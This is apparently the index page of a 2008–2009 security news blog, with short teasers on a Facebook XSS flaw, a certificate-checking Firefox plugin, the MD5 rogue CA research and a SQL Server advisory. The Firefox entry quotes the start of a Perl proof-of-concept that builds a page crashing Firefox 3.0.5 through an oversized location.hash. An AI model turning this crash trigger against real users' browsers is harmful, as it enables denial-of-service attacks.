Facebook “Reset Password” XSS Flaw

Saturday, January 3rd, 2009

DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page.  Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members. We hope that this serious flaw gets fixed quickly as is usually the case with ...

SSL Blacklist – Firefox Plugin Detects Bad Certificates

Friday, January 2nd, 2009

This Firefox plugin was first created back during the Debian/OpenSSL scare about 6 months ago where the key pairs that were generated from an affected machine were easily guessable. Marton Anka created this plugin to help users find these bad certificates: On 12/31/2008, Marton updated this plugin to detect the ...

Full Details Of The MD5 Vulnerability

Tuesday, December 30th, 2008

We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted ...

Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

Tuesday, December 23rd, 2008

#!/usr/bin/perl # mzff_lhash_dos.pl # Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # Crash on Vista, play with it on XP $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n\n"; } $head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n"; $trig = "location.hash = \"" . "A" x 20000000 . "\";" ...

Microsoft confirms critical SQL Server vulnerability

Monday, December 22nd, 2008

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line. The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...